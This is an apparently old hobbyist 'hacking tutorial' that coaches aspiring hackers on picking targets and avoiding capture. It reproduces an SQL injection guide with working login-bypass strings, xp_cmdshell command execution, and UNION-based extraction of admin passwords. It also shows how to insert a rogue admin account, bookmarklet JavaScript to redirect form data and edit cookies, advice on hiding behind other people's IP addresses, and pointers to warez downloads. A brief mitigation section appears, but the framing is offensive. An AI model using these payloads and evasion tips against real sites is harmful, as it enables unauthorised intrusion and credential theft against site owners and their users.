Avinash Hacking TuT, Ok If you want to be like the elite hackers read this...
This is a tutorial for all of you wanna be hackers.
I will take you step by step from a noob script kidde to a respected intermediate or elite hacker.
Chapter 1: Operating System of Choice
Ok the 3 most popular operating systems used by hackers are:
Windows{WinNT/Win2k} | Mac{MAC OS X} | Linux{Backtrack Linux}
Ok if your not familiar with hacking on any of these OS (Operating System) i suggest you start with Linux. The reason being is that once you get used to hacking on windows its extremely difficult to switch. However what you learn in linux you can apply anywhere. So start with linux but if your used to mac or windows its ok.
One thing i don't want to hear from any of you is how powerfull an OS is:
Windows in the hands of an elite hacker is more powerfull than a fully custemized prescripted linux in the hands of a script kidde.
I like to use the saying: Its the player not the cards.
And i find it to be true in hacking. It does not matter the strength of your tools (to a degree if your using windows 3.1x then good luck 
). All that matters is your skill level.
Chapter 2: Targeting And Risk Assesment
Targeting:
Lets get this right the first time since this is the most important task you must do.
It sounds simple right pick a target hack it. WRONG!!!!
First of all if you want to be a hacker you cannot just hack 1 site or 1 network.
You need a variety of enviroments and situations to shape you into an effective hacker.
No one likes a hacker that just hacks 1 network and then shows off (infact its better not to tell anyone you hacked the network or site but i will go into that in Chapter 3).
Also pick something that is at YOUR SKILL LEVEL. I cannot enfasize this enough!
You could say for example that i want to hack www.micro$oft.com.
I would say if you don't have the brain to realise you would get caught then your not worthy of this guide.
Risk Assesment:
This is ultimately what makes or breaks a hacker.
It is what differientiates a skilled hacker from a mad computer scychopath.
You need to be able to asses risks involved in your future or current hacking activities.
There is always a chance of getting caught nomatter if your using the freedom network and are on a alternating proxy script ranging in 26 countries around the world (which really is the best protection you could have).
Its composed of 33% skill assesment and 66% target assesment.
You need to know your skill level and rate it from 0(being a complete noob) to 33(world class hacker).
You need to know "strong" your target is and what tracing and policing powers it has; rate it from 0 to 66 using the table below.
To judge your target you need to do a background check on the corperation or the individual running it.
Average Salary 10% - higher paid does not nessecarely mean more skilled but it is generally the case
Employment number 16% - The more people after you the worse
Skill of Employees 20% - This is really important -- last thing you need is an x-world class hacker working for the company --- that can really screw you up (trust me i know it first hand)
Market Influence 20% - Don't Go after a fortune 500 company unless your ready for the fbi and cia computer crime taskforces on you.
<div align="left">Chapter 3: Hackkits/Scripts vs Manual Portscanning/Trojan Droppers/Worms/Viruses
You need to decide wether you will be using hackkits and scripts (classified as autohacking) or Manual method or a combination.
This is up to you but personally i would use the manual method. This has nothing to do with the power/effectiveness of the tool; Its just i don't trust my ass to a computer script designed by someone ive never heard of.
Scroll down to download several of these that i have in my collection.
Chapter 4: Sql & Perl (Scriptable programming languages) Injection
My friend Sk wrote a great article on this so il just borrow his work
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-...1Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/Whi...QLInjection.pdf
Chapter 5: Javascript & Related
First of all don't confuse Sun's JavaTM with Javascript!
Part 1: Inline Javascript
Using Inline Javascript the user can alter things in a website without having to leave it or save the page in his PC. This is done using the address bar from his browser. The syntax of the commands looks like this:
java script:alert(#command#)
For example, if you want to see an alert inside the http://www.example.com site, type the URL in the adress bar and when the
page loads, delete the URL and type:
javascrit:alert("Hello World")
As a new URL. This way an alert will show up saying 'Hello World'. However, with this technique someone can alter almost everything in a page. For example an image. Lets suppose that there is an image with the site's logo. By viewing the source of the page (This can be done by going to View-Source) we find this piece of HTML code:
<IMG Name="hi" SRC="hello.gif">
So there is an image named "hi" and the source of it is "hello.gif". We want to change this to "bye.jpeg" that is stored on our site http://www.mysite.com. So the full URL of our image is http://www.mysite.com/bye.jpeg
Using Inline Javascript we type in the adress bar:
java script:alert(document.hi.src="http://www.mysite.com/bye.jpeg")
You will see an alert saying http://www.mysite.com/bye.jpeg and after that the image will be changed. Notice though that those changes are temporary! If you refresh the page or enter it again your changes will be lost, because you dont alter the site in the server but in your PC.
Using the same way we can view or change the value of variables. For example we find this piece of code in the site's source:
<script LANGUAGE="JavaScript">
var a="test"
</SCRIPT>
This means that the variable with the name a has the value "test". In order to view the value of the variable we would type:
java script:alert(a)
And in order to change it from 'test' to 'hello':
java script:alert(a="hello")
However Inline Javascript is mostly used in changing form's attributes. Thats the piece of code we have:
<form name="format" action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit"></form>
We want the form to be sent to our mailbox and not to someone@somewhere.com
This can be done by this command:
java script:alert(document.format.mail.value="me@hacker.com")
As you have noticed by now we always use a hierarchy in the items we edit:
We start from the bigger to the smaller:
1) We started with document
2) We typed the name of the object we wanted to alter (for example document.hi.src) or the item in which it belonged and then the name of it (for example document.format.mail.value)
3) Lastly we ended in the attribute of the item we wanted to change (for example its source: document.hi.src, or its value: document.format.mail.value)
4) We separated the words using dots (.)
5) When we wanted to change an attribute we used the equal sign (=) and the new attribute.
*NOTE: We use "" when the new attribute is a character string (for example: document.format.mail.value="me@hacker.com")
If we wanted it to be the value of a variable we wouldnt used the "". For example we want to change the variable a's value to
the value of variable b.We would type java script:alert(a=
However most items in a page have no name. For example:
<form action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit"></form>
In this code the form's name is missing. Using all the above, the command would look like this:
java script:alert(document. .mail.value="me@hacker.com")
In this case we will have to count all the forms to find out the form's number. I will use an example:
<form action="send.php" method="post">
<input type="text" name="name">
<input type="submit" value="submit">
</form>
<form action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit">
</form>
<form action="send.php" method="post">
<input type="text" name="name">
<input type="submit" value="submit">
</form>
In this code we see 3 forms, but the one we are interested in is the second. So the number of the form we want is 2.
We must not forget that we start counting from number 1. We say 1,2,3,4... However in JavaScript the counting starts from number 0.It goes 0,1,2,3 etc.
So the actual number of the form is number 1 not 2. In general find the number of the form and take out one (number-1).
We will use this number to fill in the gap in our command:
java script:alert(document.forms[1].mail.value="me@hacker.com")
Like this you can change images or links that have no name. To do that just change "forms" to the type of item you want to change:
For Images it would be:
java script:alert(document.images[3].src="#the url of the picture you want#")
For links it would be:
java script:alert(document.links[0].href="#the url you want#")
Lastly, we can use this technique to edit cookies.
The command is the following and was written by Dr_aMado from triviasecurity.net, but i altered it a bit so that it shows the cookie before the user edits it.
Just copy-paste this line to the adress bar:
java script:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape©.replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert('The cookie is: "'+document.cookie+'"');alert(c(prompt("The name of the cookie:",""),prompt("Change this value:",""),prompt("with this:","")));
** Added by Kane:
If you would like to edit your cookies manually, then this command will do that for you.
java script:alert(document.cookie)
That will show you your current cookie. Say for example, that is 'userid=1'. You want to change that to 'userid=2'. You would use the following command:
java script:alert(document.cookie="userid=2")
** Back to oringal article
As a conclusion, i must stress that the changes are made only on the user's side! It's like saving the site in your PC and then modifying it. However, using this technique you can trick a page (for example with cookies) or pass the reference security of a page.
For example some pages check from where the user sends the data. Specifically if the data from http://www.test.com/form.php was sent to http://www.test.com/check.php
check.php would possible check if the data was sent from the form in http://www.test.com/form.php
Except for that, if you manage to enter your own JavaScript code in a page, using something like this technique you will be able to alter pictures and staff like that permanently!
However you need further knowledge than the one which is provided here
Part 2: Javascript Debate - An interesting Article about the meaning of Inline Javascript
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Semantics of Javascript Injections
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
By JoeyAdms
Why are Javascript Injections taking heat over meaning, why do people argue over wether it is logical to
call them this, and how can these disputes be disproved.
First and Formost, what is javascript.
Javascript is a scripting language developed by Netscape as a simplified scripting language for use in HTML Documents.
Most Modern-day browsers have interpreters that allow javascript actions to be executed. Although it is cast in exile, it serves purpose for
determining browser/OS type for use with Cascading Style Sheets, and for the few who can actually use it proficiently, it can be a powerful
Server and Client side tool. As simplified as it is, Javascript's compliancy and capabilities makes any browser with it
enabled and no rules set a ticking timebomb.
Inline Javascript
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[q]People argue that "Inline Javascript" is the process of putting javascript commands in-a-line in the browsers url bar.
[a]FALSE!
Inline javascript is the process of running javascript commands On-The-Fly as in this example.
<input type="button" value="Hello" onClick="alert('Hello World!');" />
Java-Scripting does not have to be formatted in between script tags, and can be used in simple situations as claimed above,
the use of this is called Inline Javascript.
Through Browser:
As I mentioned, most modern-day browsers have javascript capabilities. A test example is below:
java script:alert('Hello World');
This is invoking the browsers javascript interpreter and executing commands on the client document.
This should be considered the same thing as running "perl helloworld.pl" from the command line interface.
Developers commonly use this form to test variables set by the server/page requested. (Cookies,Sessions, etc.)
Why Javascript Injection is Called Javascript Injection
::::::::::::::::::::::::::::::::::::::::::::::
[q]Ok so I said that I am running commands on the client side by using the browser technique, so why is this considered javascript-
injection, it is doing nothing to the page at hand?
[a]WRONG!
Consider this as an html document. (trimmed for format)
<Doctype/>
<html>
<head>
</head>
<body>
<p>Hello World</p>
</body>
</html>
Now Say we run ( java script:alert('hello world'); ) in our Browser. You may think this changes nothing, but what you should be doing
is visualizing our same html document looking like this now.
<Doctype/>
<html>
<head>
<script language="text/Javascript">
alert('hello world');
</script>
</head>
<body>
<p>Hello World</p>
</body>
</html>
I will leave the next arguments up to you, however you argue with what I have just said, it can be explained by the following.
Using Javascript in your browser's URL Bar lets you change values on the page you are viewing, now these changes are client side, but
if you remember, websites use client-side javascript to serve a purpose, and by altering values, you COULD by chance change the intended
operation of the page you are viewing. (As learned in some HTS.org challenges).
Remember, Javascript does not have to be server-side, or even have to reach the server to make a difference, it is the "Values" that make the
difference. ( i.e. user=joey != user=admin ... i would much rather user=admin )
Changing these values can give a number of things, depending on what the client-side javascript is being used for.
(Escalated priveledges, Infinite Time, Change Actions/Methods, Bypassing Filters/Auths)
XSS :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
NOTE: XSS IS NOT JAVASCRIPT INJECTION!!!
Cross-Site Scripting(XSS) is the process of executing script on a website that is not intended. (This script could be HTML , JAVASCRIPT, PHP,
whatever)
An HTML example would be adding links to a page that is not intended.
XSS can be masked through forms, through ajax,tinyurls through tons of methods, and the user does not have to be aware it has taken place.
XSS does NOT have to be GET variables
People consider the use of javascript with XSS is considered javascript-injection but using javascript through their browser is not.
NEWS FLASH.. ITS THE SAME THING. The javascript is still executed locally, and the server gets nothing except a log saying that a user
made a malformed request.
DEFINE INJECTION FOR ME
::::::::::::::::::::::::::::::::::::::::
Related Definitions:
to introduce (a new aspect or element);
transitive verb add something to situation: to introduce a particular quality or element into a situation
If by now you think that using javascript through your browsers interpreter to change values on a page is not ( introducing, or adding a quality
or element) to the page you are viewing, then please re-read this article with an open mind. Else, you would agree that you can Inject
Javascript Locally, and therefore would agree that changing values with the browsers interpreter is called javascript-injection.
To be honest, im sick of semantics, as long as you know Java != JavaScript, and you know what you are talking about, then who cares about the
rest, you can call it javascript-intrusions for all I care. I did not write this to fight,offend or discourage anyone, just to simply prove my
point.
On a last note, I dont care if you still do not agree with it, if you still argue with it you are ignorant. It does not hurt my feelings if you
say I am wrong, so dont waste your breath.
Chapter 6: Anonymity
Part 1: Privacy Tools
Privacy software is software built to protect the privacy of its users. The first thing to look for when you buy Internet privacy software is ease of use. Privacy software is almost becomming a necessity with ID theft and computer hacking. Privacy software is designed to quickly and easily eliminate history files, shred deleted files and keep Windows �clean�. Privacy software is not free and must be paid for after a trial period. Privacy software is available which can prevent the IP address you are using from being visible in the log files of the web sites that you visit. Privacy Software is a program that destroys sensitive local files and documents and erases your tracks. This computer privacy software is a "must-have" tool for anyone who uses the Internet. Privacy software is unusual in that when it works successfully, unexpected intrusions or other problems are averted and appear to not have existed at all. [/size] The best privacy software is open source so it's free. Firewalls and Security/Privacy software is designed to protect your computer by blocking the many unused and unsecureports into your computer.
Privacy software will no doubt advance, as will the technology to beat it. Privacy Software will ensure that no cookies remain on your computer that might give clues about your online activity. Privacy Software ensures that deleted files really are deleted. Internet privacy software is designed find and clean up files left by Windows. Use Internet privacy software to permanently remove deleted files. If you concern about Internet privacy, you should use privacy software.
While a good deal of quality privacy software is available for free, many programs are expensive. Firewall is good, internet security software is good, anti-virus is good, privacy software is good. While investing in anti-virus, firewall and privacy software is essential, don't think of it as a cure-all.
[size="2"]Ive included some of these at the bottom of my post
Part 2: Proxy Tools
1.0 First off what is a proxy?
In computer networks, a proxy server is a server (a computer system or an application program) which services the requests of its clients by forwarding requests to other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server provides the resource by connecting to the specified server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server.
A proxy server that passes all requests and replies unmodified is usually called a gateway or sometimes tunnelling proxy.
A proxy server can be placed in the user's local computer or at specific key points between the user and the destination servers or the Internet.
2.0 What applications can this have for anonymity?
The best method of anonymity is blaming/using some else's ip address for your own purposes.
3.0 What are the best proxy tools?
Well my number 1 favorite is Tor which can be optained here:
http://tor.eff.org/
But here some other tools:
Hide Ip platinum
Steganos VPN
Cisco VPN
Freedom
Chapter 7: Antivirus and Hackers Defence
Ok your a hacker right , well why should you be worried about viruses/trojans/worms?
Because Hackers will hack Hackers. Infact there thousands of hackers who's speciality is hacking other hackers.
Also some tools may be viruses/trojans/worms designed to look like a hacking tool.
You need to protect yourself if your going to survive them.
Part 1:
But first lets learn the difference between a virus/trojan/worm:
The most common blunder people make when the topic of a computer virus arises is to refer to a worm or Trojan horse as a virus. While the words Trojan, worm and virus are often used interchangeably, they are not the same. Viruses, worms and Trojan Horses are all malicious programs that can cause damage to your computer, but there are differences among the three, and knowing those differences can help you to better protect your computer from their often damaging effects. A computer virus attaches itself to a program or file so it can spread from one computer to another, leaving infections as it travels. Much like human viruses, computer viruses can range in severity: Some viruses cause only mildly annoying effects while others can damage your hardware, software or files. Almost all viruses are attached to an executable file, which means the virus may exist on your computer but it cannot infect your computer unless you run or open the malicious program. It is important to note that a virus cannot be spread without a human action, (such as running an infected program) to keep it going. People continue the spread of a computer virus, mostly unknowingly, by sharing infecting files or sending e-mails with viruses as attachments in the e-mail.
A worm is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, it has the capability to travel without any help from a person. A worm takes advantage of file or information transport features on your system, which allows it to travel unaided. The biggest danger with a worm is its capability to replicate itself on your system, so rather than your computer sending out a single worm, it could send out hundreds or thousands of copies of itself, creating a huge devastating effect. One example would be for a worm to send a copy of itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself out to everyone listed in each of the receiver's address book, and the manifest continues on down the line. Due to the copying nature of a worm and its capability to travel across networks the end result in most cases is that the worm consumes too much system memory (or network bandwidth), causing Web servers, network servers and individual computers to stop responding. In more recent worm attacks such as the much-talked-about .Blaster Worm., the worm has been designed to tunnel into your system and allow malicious users to control your computer remotely.
Key Terms To Understanding Computer Viruses: virus
A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes.
Trojan Horse
A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate themselves
worm
A program or algorithm that replicates itself over a computer network and usually performs malicious actions
blended threat
Blended threats combine the characteristics of viruses, worms, Trojan Horses, and malicious code with server and Internet vulnerabilities .
antivirus program
A utility that searches a hard disk for viruses and removes any that are found.
A Trojan Horse is full of as much trickery as the mythological Trojan Horse it was named after. The Trojan Horse, at first glance will appear to be useful software but will actually do damage once installed or run on your computer. Those on the receiving end of a Trojan Horse are usually tricked into opening them because they appear to be receiving legitimate software or files from a legitimate source. When a Trojan is activated on your computer, the results can vary. Some Trojans are designed to be more annoying than malicious (like changing your desktop, adding silly active desktop icons) or they can cause serious damage by deleting files and destroying information on your system. Trojans are also known to create a backdoor on your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. Added into the mix, we also have what is called a blended threat. A blended threat is a sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and malicious code into one threat. Blended threats use server and Internet vulnerabilities to initiate, transmit and spread an attack. This combination of method and techniques means blended threats can spread quickly and cause widespread damage. Characteristics of blended threats include: causes harm, propagates by multiple methods, attacks from multiple points and exploits vulnerabilities.
To be considered a blended thread, the attack would normally serve to transport multiple attacks in one payload. For examplem it wouldn't just launch a DoS attack — it would also install a backdoor and damage a local system in one shot. Additionally, blended threats are designed to use multiple modes of transport. For example, a worm may travel through e-mail, but a single blended threat could use multiple routes such as e-mail, IRC and file-sharing sharing networks. The actual attack itself is also not limited to a specific act. For example, rather than a specific attack on predetermined .exe files, a blended thread could modify exe files, HTML files and registry keys at the same time — basically it can cause damage within several areas of your network at one time.
Blended threats are considered to be the worst risk to security since the inception of viruses, as most blended threats require no human intervention to propagate.
Combating Viruses, Worms and Trojan Horses
The first steps to protecting your computer are to ensure your operating system (OS) is up-to-date. This is essential if you are running a Microsoft Windows OS. Secondly, you should have anti-virus software installed on your system and ensure you download updates frequently to ensure your software has the latest fixes for new viruses, worms, and Trojan horses. Additionally, you want to make sure your anti-virus program has the capability to scan e-mail and files as they are downloaded from the Internet. This will help prevent malicious programs from even reaching your computer. You should also install a firewall as well.
A firewall is a system that prevents unauthorized use and access to your computer. A firewall can be either hardware or software. Hardware firewalls provide a strong degree of protection from most forms of attack coming from the outside world and can be purchased as a stand-alone product or in broadband routers. Unfortunately, when battling viruses, worms and Trojans, a hardware firewall may be less effective than a software firewall, as it could possibly ignore embedded worms in out going e-mails and see this as regular network traffic. For individual home users, the most popular firewall choice is a software firewall. A good software firewall will protect your computer from outside attempts to control or gain access your computer, and usually provides additional protection against the most common Trojan programs or e-mail worms. The downside to software firewalls is that they will only protect the computer they are installed on, not a network.
It is important to remember that on its own a firewall is not going to rid you of your computer virus problems, but when used in conjunction with regular operating system updates and a good anti-virus scanning software, it will add some extra security and protection for your computer or network.
Part 2:
Best Antivirus and Anti hacking tools(Note Some of these may detect your hack tools as viruses)
Most of these can be found in our warez sections.
Cyberhawk Public Beta 1.0.0.37 Cyberhawk detects and protects you against all types of security threats including viruses, worms, spyware and hackers.
Sysinternals RootkitRevealer 1.56 RootkitRevealer is an advanced patent-pending root kit detection utility.
F-Secure BlackLight 2.2.1007 Beta F-Secure BlackLight Rootkit Elimination Technology detects objects that are hidden from users and security tools and offers the user an option to remove them.
AntiVir Personal Edition 6 Effective protection against computer viruses for the individual and private use.
AVG Anti-Virus Free 7.1.371
AVG Anti-Virus offers maximum virus protection, product customization, and free virus database updates and technical support.
ClamAV 0.87.1-2 ClamAV is an open source antivirus solution that features a command line interface for scanning files
avast! Home 4.6.739 avast! is an antivirus set that is able to detect the presence of viruses in computers.
McAfee AVERT Stinger 2.5.8 McAfee AVERT Stinger is a stand-alone utility used to detect and remove specific viruses
Best Anti-Spyware Tools - Again Most of these can be found in our warez sections
